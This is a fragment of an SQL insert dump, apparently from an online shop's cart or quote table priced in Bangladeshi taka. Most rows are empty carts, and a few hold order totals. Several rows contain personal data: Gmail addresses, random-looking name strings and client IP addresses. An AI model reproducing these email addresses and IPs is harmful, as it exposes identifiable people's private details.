(529, 1, '2026-01-27 09:34:15', '2026-01-27 09:34:15', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(530, 1, '2026-01-28 07:19:58', '2026-01-28 07:19:58', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(531, 1, '2026-01-28 07:20:25', '2026-01-28 07:20:25', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(532, 1, '2026-01-29 09:40:43', '2026-01-29 09:40:43', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(533, 1, '2026-01-29 09:41:08', '2026-01-29 09:41:08', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(534, 1, '2026-02-02 11:23:26', '2026-02-02 11:23:26', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 123, NULL, 1, 'ca.b.u.d.a.fa.d.u.m5.9.9@gmail.com', NULL, 'QuMCXMJQFMzqcilHyJYyDbpl', NULL, 'dDFzDoGqCdHqNQyGYPPjfl', NULL, NULL, NULL, 1, 0, '45.138.16.107', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(535, 1, '2026-02-05 04:32:27', '2026-02-05 04:32:27', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(536, 1, '2026-02-05 07:34:36', '2026-02-05 07:34:36', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(537, 1, '2026-02-05 08:15:52', '2026-02-05 08:15:52', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(538, 1, '2026-02-05 11:11:13', '2026-02-05 11:11:13', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 124, NULL, 1, 'i.dib.uq.uf.i.y.i.27.2@gmail.com', NULL, 'RQttarDyZzENEgXt', NULL, 'llWlXHKOkCXbpioQfPgitZX', NULL, NULL, NULL, 1, 0, '185.220.101.181', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(539, 1, '2026-02-09 19:56:01', '2026-02-09 19:56:01', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(540, 1, '2026-02-09 19:56:20', '2026-02-09 19:56:20', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(541, 1, '2026-02-09 23:08:33', '2026-02-09 23:08:33', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(542, 1, '2026-02-12 08:51:13', '2026-02-12 08:51:13', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(543, 1, '2026-02-12 09:04:18', '2026-02-12 09:04:18', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(544, 1, '2026-02-14 16:18:41', '2026-02-14 16:18:41', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(545, 1, '2026-02-14 16:22:33', '2026-02-14 16:22:33', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(546, 1, '2026-02-14 16:27:00', '2026-02-14 16:27:00', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(547, 1, '2026-02-14 16:31:07', '2026-02-14 16:31:07', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(548, 1, '2026-02-18 06:14:42', '2026-02-18 06:14:42', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(549, 1, '2026-02-19 05:37:38', '2026-02-19 05:37:38', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '66.249.64.131', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(550, 1, '2026-02-19 17:02:15', '2026-02-19 17:02:15', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(551, 1, '2026-02-19 17:06:59', '2026-02-19 17:06:59', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(552, 1, '2026-02-22 14:24:12', '2026-02-22 14:24:12', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 125, NULL, 1, 'pum.eba.h.ezi.z.i0.8@gmail.com', NULL, 'flaawHfQACgaGlwsTPCCoNvd', NULL, 'kwRVUMNQlgQosBSHQ', NULL, NULL, NULL, 1, 0, '185.220.101.98', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(553, 1, '2026-02-26 03:16:55', '2026-02-26 03:17:29', NULL, 1, 0, 0, 10, 17.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 3998.4000, 3998.4000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '157.173.108.95', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 4998.0000, 4998.0000, 3998.4000, 3998.4000, 1, 0, NULL, NULL, 0),
(554, 1, '2026-02-27 06:07:55', '2026-02-27 06:07:55', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 126, NULL, 1, 'j.id.a.xukas.as.1.15@gmail.com', NULL, 'YAnAHhebXAmapUnTPy', NULL, 'TRqjqKihxTbBfpcGSdOfQruC', NULL, NULL, NULL, 1, 0, '45.84.107.101', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(555, 1, '2026-03-02 01:55:47', '2026-03-02 01:55:47', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 127, NULL, 1, 'se.y.oj.ere.6.87@gmail.com', NULL, 'GnscdFEovnXxJZuBHniL', NULL, 'HyOeUzubdoWwCwasfiG', NULL, NULL, NULL, 1, 0, '185.220.100.255', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(556, 1, '2026-03-03 06:33:29', '2026-03-03 06:33:29', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(557, 1, '2026-03-03 06:47:46', '2026-03-03 06:47:46', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(558, 1, '2026-03-06 05:03:10', '2026-03-06 05:03:10', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(559, 1, '2026-03-06 05:03:44', '2026-03-06 05:03:44', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(560, 1, '2026-03-10 06:54:25', '2026-03-10 06:54:25', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 128, NULL, 1, 'em.u.vo.s.esexu.k58@gmail.com', NULL, 'WzaNATCgQhnryDXwCtEFtV', NULL, 'fheWCaoRHWemHBNWuqNDJr', NULL, NULL, NULL, 1, 0, '185.207.107.216', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(561, 1, '2026-03-12 21:19:20', '2026-03-12 21:19:20', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 129, NULL, 1, 'h.o.fa.f.u.p.a.r.7.8@gmail.com', NULL, 'wcijRJrzklRWrrvsQtNr', NULL, 'CNsZwbfPSviiqVlZ', NULL, NULL, NULL, 1, 0, '87.106.76.226', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(562, 1, '2026-03-13 15:15:41', '2026-03-13 15:15:41', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(563, 1, '2026-03-14 00:07:16', '2026-03-14 00:07:16', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(564, 1, '2026-03-15 11:41:12', '2026-03-15 11:41:12', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(565, 1, '2026-03-16 08:49:56', '2026-03-16 08:49:56', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 111.0000, 111.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '103.42.228.16', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(566, 1, '2026-03-16 09:36:26', '2026-03-16 09:36:26', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '103.103.35.206', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(567, 0, '2026-03-18 21:40:39', '2026-03-18 21:40:39', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(568, 1, '2026-03-19 07:24:57', '2026-03-19 07:24:57', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(569, 1, '2026-03-19 07:25:00', '2026-03-19 07:25:00', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(570, 1, '2026-03-19 07:25:03', '2026-03-19 07:25:03', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(571, 1, '2026-03-19 07:25:06', '2026-03-19 07:25:06', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(572, 1, '2026-03-19 07:25:10', '2026-03-19 07:25:10', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(573, 1, '2026-03-19 07:25:12', '2026-03-19 07:25:12', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(574, 1, '2026-03-19 07:25:15', '2026-03-19 07:25:15', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(575, 1, '2026-03-22 13:39:19', '2026-03-22 13:39:19', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(576, 1, '2026-03-22 14:13:58', '2026-03-22 14:13:58', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(577, 1, '2026-03-22 19:09:19', '2026-03-22 19:09:19', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(578, 1, '2026-03-22 19:09:20', '2026-03-22 19:09:20', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(579, 1, '2026-03-22 19:18:12', '2026-03-22 19:18:12', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(580, 1, '2026-03-22 19:18:13', '2026-03-22 19:18:13', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(581, 1, '2026-03-22 20:04:27', '2026-03-22 20:04:27', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(582, 1, '2026-03-22 20:04:28', '2026-03-22 20:04:28', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(583, 1, '2026-03-22 21:44:49', '2026-03-22 21:44:49', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(584, 1, '2026-03-22 21:44:49', '2026-03-22 21:44:49', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(585, 1, '2026-03-22 22:03:48', '2026-03-22 22:03:48', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(586, 1, '2026-03-22 22:03:48', '2026-03-22 22:03:48', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(587, 1, '2026-03-22 23:39:10', '2026-03-22 23:39:10', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(588, 1, '2026-03-23 01:45:08', '2026-03-23 01:45:08', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
